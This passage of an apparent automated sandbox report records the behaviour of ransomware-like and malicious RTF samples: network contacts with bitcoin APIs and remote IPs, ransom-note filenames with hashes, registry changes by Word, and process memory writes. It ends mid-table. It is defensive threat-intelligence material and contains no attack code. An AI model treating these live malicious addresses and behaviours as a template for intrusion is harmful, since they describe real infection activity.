| FR | 178.33.163.246:6893 | udp | |
| FR | 178.33.163.247:6893 | udp | |
| FR | 178.33.163.248:6893 | udp | |
| FR | 178.33.163.249:6893 | udp | |
| FR | 178.33.163.250:6893 | udp | |
| FR | 178.33.163.251:6893 | udp | |
| FR | 178.33.163.252:6893 | udp | |
| FR | 178.33.163.253:6893 | udp | |
| FR | 178.33.163.254:6893 | udp | |
| FR | 178.33.163.255:6893 | udp | |
| US | 8.8.8.8:53 | api.blockcypher.com | udp |
| US | 104.20.98.10:80 | api.blockcypher.com | tcp |
| US | 8.8.8.8:53 | btc.blockr.io | udp |
| US | 8.8.8.8:53 | bitaps.com | udp |
| NL | 178.128.255.179:443 | bitaps.com | tcp |
| US | 8.8.8.8:53 | chain.so | udp |
| US | 172.67.40.90:443 | chain.so | tcp |
Files
memory/2192-1-0x0000000000400000-0x0000000000435000-memory.dmp
memory/2192-0-0x00000000002E0000-0x0000000000311000-memory.dmp
memory/2192-2-0x0000000000400000-0x0000000000435000-memory.dmp
memory/2192-5-0x0000000000400000-0x0000000000435000-memory.dmp
memory/2192-9-0x0000000000400000-0x0000000000435000-memory.dmp
memory/2192-75-0x0000000000400000-0x0000000000435000-memory.dmp
C:\Users\Admin\Desktop\_R_E_A_D___T_H_I_S___WK6IB3_.hta
| MD5 | 57a8c0d4fe772033335dd5a23a210911 |
| SHA1 | 6f19c3a3e0a2037b3347a5563cc40fc4fc0eafde |
| SHA256 | 55fc9efb7c5157327de83d6483f0e75c7d52c1438683362e5c13a123d5826e3f |
| SHA512 | dd3f911ef156ac061b20e4e190663971c92c616b09584059ad31b83bd1bb8790eacb75ee62f2145622a8da1ea6673e9d28da55c78c3e671fddf9938a4e3db8b0 |
C:\Users\Admin\Desktop\_R_E_A_D___T_H_I_S___VBTJZKN_.txt
| MD5 | e518b413e44fb9f72485ca6d10a32a5b |
| SHA1 | 61171a22842177a69e19b123a4504d53c675a740 |
| SHA256 | 708bb4f2709d9660a8fac808e561dad8026396346bc347185b1c7e8f1e1c158a |
| SHA512 | 5b4c17175031de5815bc9dad389c51e3eee917d2a64857369db708c52ef60aa9a42f60657f3db29dcd1db2179cfafb493eb97b3edaf85da779902bd8b0e82596 |
memory/2192-111-0x0000000000400000-0x0000000000435000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
C:\Users\Admin\AppData\Local\Temp\Tar4E65.tmp
| MD5 | 4ea6026cf93ec6338144661bf1202cd1 |
| SHA1 | a1dec9044f750ad887935a01430bf49322fbdcb7 |
| SHA256 | 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8 |
| SHA512 | 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b |
memory/2852-307-0x0000000140000000-0x00000001405E8000-memory.dmp
memory/2852-308-0x0000000140000000-0x00000001405E8000-memory.dmp
memory/2852-309-0x0000000140000000-0x00000001405E8000-memory.dmp
Analysis: behavioral19
Detonation Overview
Submitted
2024-06-30 00:59
Reported
2024-06-30 01:30
Platform
win7-20240221-en
Max time kernel
1561s
Max time network
1565s
Command Line
Signatures
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Office loads VBA resources, possible macro or embedded object present
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\MenuExt | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon\ = "\"%1\"" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\htmlfile | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\ = "&Edit" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\14 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\ShellEx | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ = "&Open" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic\ = "system" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" %1" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\mhtmlfile | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\ = "&Open" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" /p %1" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ = "&Open" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\ = "[open(\"%1\")]" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\ShellEx | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ = "&Open" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\ = "&Open" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\ = "&Open" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\ = "&Print" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2880 wrote to memory of 2464 | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | C:\Windows\splwow64.exe |
| PID 2880 wrote to memory of 2464 | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | C:\Windows\splwow64.exe |
| PID 2880 wrote to memory of 2464 | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | C:\Windows\splwow64.exe |
| PID 2880 wrote to memory of 2464 | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | C:\Windows\splwow64.exe |
Processes
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\fe2e5d0543b4c8769e401ec216d78a5a3547dfd426fd47e097df04a5f7d6d206_OFkNP1kKL9.rtf"
C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
Network
| Country | Destination | Domain | Proto |
| DE | 84.200.16.242:80 | tcp | |
| DE | 84.200.16.242:80 | tcp |
Files
memory/2880-0-0x000000002F1E1000-0x000000002F1E2000-memory.dmp
memory/2880-1-0x000000005FFF0000-0x0000000060000000-memory.dmp
memory/2880-2-0x000000007104D000-0x0000000071058000-memory.dmp
memory/2880-5-0x000000007104D000-0x0000000071058000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm
| MD5 | 8a3e2aeb937fc1ad9ac07e24650e0287 |
| SHA1 | 9a9eaaae50e155d5bef572bbc2f4690dfd696fe9 |
| SHA256 | 152b9e1e72ee0a7f77c68379b12068959975d25c5da9469f8f1067de713a81a7 |
| SHA512 | 83bab3041052027e219bd2b597a561f7e37a842faf55ae3f7b214e8bcfdcf5bed7ddc1b99f247833d941d8ff41403f7d2ec3ac50b68ac80b7d04823960ff6775 |
memory/2880-29-0x000000005FFF0000-0x0000000060000000-memory.dmp
memory/2880-30-0x000000007104D000-0x0000000071058000-memory.dmp
Analysis: behavioral20
Detonation Overview
Submitted
2024-06-30 00:59
Reported
2024-06-30 01:30
Platform
win10v2004-20240508-en
Max time kernel
1796s
Max time network
1799s
Command Line
Signatures
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
